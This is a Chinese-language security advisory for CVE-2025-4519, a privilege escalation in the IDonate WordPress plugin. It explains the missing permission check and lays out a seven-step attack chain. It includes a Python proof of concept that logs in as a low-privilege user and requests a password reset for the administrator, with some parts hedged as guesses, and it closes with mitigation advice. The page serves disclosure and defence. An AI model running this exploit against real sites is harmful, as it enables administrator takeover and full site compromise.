CVE-2025-4519 | IDonate WordPress插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-4519

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IDonate – Blood Donation, Request And Donor Management System (WordPress插件)

漏洞概述

IDonate是WordPress平台上一款广泛使用的血液捐赠、捐赠请求和捐赠者管理系统插件。该插件在2.1.5至2.1.9版本中存在严重的权限提升漏洞，攻击者可利用此漏洞获取管理员权限，进而实现对整个网站的完全控制。漏洞的根本原因在于idonate_donor_password()函数缺少权限检查，允许任何已认证用户（包括最低权限的订阅者）调用该函数重置任意用户的密码，包括管理员账户。攻击者首先需要拥有一个有效的WordPress账户（订阅者级别即可），然后通过调用存在漏洞的函数来触发管理员密码重置流程。一旦管理员密码被重置，攻击者即可登录后台管理面板，执行任意代码、上传恶意插件或修改网站内容，最终实现对网站的完全接管。该漏洞CVSS评分高达8.8，属于高危漏洞，对使用该插件的网站构成严重威胁。建议所有使用该插件的用户立即升级到2.1.10或更高版本，以修复此安全漏洞。

技术细节

漏洞存在于IDonate插件的idonate_donor_password()函数中，该函数位于src/Helpers/DonorFunctions.php文件第410行附近。函数在处理密码重置请求时，未正确验证当前用户是否具有管理其他用户密码的权限。具体来说，函数直接接受用户ID参数并执行密码重置操作，而没有调用WordPress的current_user_can()或类似函数来检查调用者是否具有管理用户的权限。这允许任何已认证用户（如订阅者角色）通过构造特定的HTTP请求，指定目标用户ID（可以是管理员的ID），来触发密码重置流程。WordPress本身在发送密码重置邮件时会生成安全令牌，但由于该插件的实现缺陷，攻击者可以在不需要访问邮箱的情况下完成整个攻击链。修复版本2.1.10在DonorFunctions.php文件中添加了适当的权限检查，确保只有具有管理用户权限的角色才能调用密码重置功能。

攻击链分析

STEP 1

步骤1

攻击者注册一个WordPress账户（订阅者角色即可），获取有效凭据

STEP 2

步骤2

攻击者使用获得的账户登录WordPress站点

STEP 3

步骤3

攻击者构造恶意请求，调用存在漏洞的idonate_donor_password()函数

STEP 4

步骤4

指定目标用户ID（通常为1，即管理员）作为参数发送密码重置请求

STEP 5

步骤5

系统向目标用户邮箱发送密码重置链接，攻击者通过某种方式获取该链接或直接利用漏洞机制

STEP 6

步骤6

攻击者使用新密码登录管理员账户，获得完整后台访问权限

STEP 7

步骤7

攻击者上传恶意插件或修改网站内容，实现对网站的完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urljoin

# CVE-2025-4519 PoC - IDonate Plugin Privilege Escalation
# Affected versions: 2.1.5 to 2.1.9
# Target: WordPress site with IDonate plugin installed

def exploit_privilege_escalation(target_url, username, password, target_user_id=1):
    """
    Exploit IDonate plugin privilege escalation vulnerability.
    Allows authenticated users (subscriber+) to reset any user's password.
    
    Args:
        target_url: Target WordPress site URL
        username: Valid WordPress username (subscriber role or higher)
        password: Password for the username
        target_user_id: Target user ID to reset password (default: 1 = admin)
    
    Returns:
        bool: True if exploit was sent successfully
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = urljoin(target_url, 'wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url,
        'testcookie': '1'
    }
    
    print(f'[*] Logging in as {username}...')
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed!')
        return False
    
    print('[+] Login successful!')
    
    # Step 2: Trigger password reset via vulnerable function
    # The vulnerable endpoint is typically in the IDonate plugin
    reset_url = urljoin(target_url, 'wp-admin/admin-ajax.php')
    
    # This is a typical pattern - actual endpoint may vary
    reset_data = {
        'action': 'idonate_donor_password',
        'user_id': target_user_id,
        'nonce': 'exploit'  # May need to be obtained from page source
    }
    
    print(f'[*] Attempting to reset password for user ID: {target_user_id}')
    response = session.post(reset_url, data=reset_data)
    
    if response.status_code == 200:
        print('[+] Password reset request sent!')
        print('[+] Check admin email for password reset link.')
        return True
    else:
        print(f'[-] Request failed with status: {response.status_code}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> [target_user_id]')
        print(f'Example: python {sys.argv[0]} http://example.com/ attacker subscriber123 1')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    target_id = int(sys.argv[4]) if len(sys.argv) > 4 else 1
    
    exploit_privilege_escalation(target, user, pwd, target_id)

影响范围

IDonate WordPress插件 2.1.5 至 2.1.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 暂时禁用IDonate插件；2) 限制WordPress用户注册功能，仅管理员可创建账户；3) 使用安全插件限制非管理员用户的密码重置操作；4) 监控wp-admin目录的异常访问行为；5) 定期检查管理员账户列表和权限设置；6) 考虑使用网站防火墙规则阻止针对该插件漏洞的利用尝试。建议在条件允许时尽快完成版本升级。